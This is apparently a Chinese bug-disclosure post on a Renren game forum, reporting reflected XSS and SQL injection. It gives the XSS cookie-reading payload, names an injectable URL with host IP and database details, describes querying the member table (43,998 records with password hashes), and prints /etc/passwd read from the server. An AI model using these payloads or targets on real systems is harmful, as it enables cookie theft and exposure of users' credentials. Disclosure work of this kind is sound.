1.人人某bbs。

2.反射型跨站，可獲取cookie。

3.sql注入,多個注入點，information_schema.columns可用，注入很方便。

4.很多個數(shù)據(jù)表，select count(*) from XXX_用戶表,結(jié)果：43998。

5.可讀取系統(tǒng)文件，例如/etc/passwd(其他的路徑?jīng)]找到)。

起因是發(fā)現(xiàn)人人網(wǎng)某分站的phpinfo()（這個沒有找到其他什么）

http://yxzb4.renren.com/index.php

結(jié)果發(fā)現(xiàn)，wooyun里面有提交了的，只是沒處理。

http://www.wooyun.org/bugs/wooyun-2010-07040

結(jié)果偶然間，爬行到另外一個站,是一個游戲論壇。

http://yxzb.renren.com/bbs/

發(fā)現(xiàn)存在反射型xss，可獲取cookie

http://yxzb.renren.com/bbs/viewthread.jsp

?extra=<script>document.write(document.cookie)</script>

&tid=9525

其中幾個頁面都存在注入，其中一個注入信息:

Target:  http://yxzb.renren.com/bbs/faq.jsp?action=message&id=24

Host IP: 111.1.20.155

Web Server:  Apache-Coyote/1.1

DB Server:  MySQL >=5

Current DB:  jsprun

可查看系統(tǒng)信息：

注入的信息：

好多個數(shù)據(jù)庫:

執(zhí)行查詢語句，查詢用戶，43998（網(wǎng)站上顯示信息：主題: 31695, 帖子: 304040, 會員: 43998）

select count(*) from  jrun_members

用戶名，密碼，郵箱，salt....

讀取/etc/passwd

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

...略

未測試是否可以拿到shell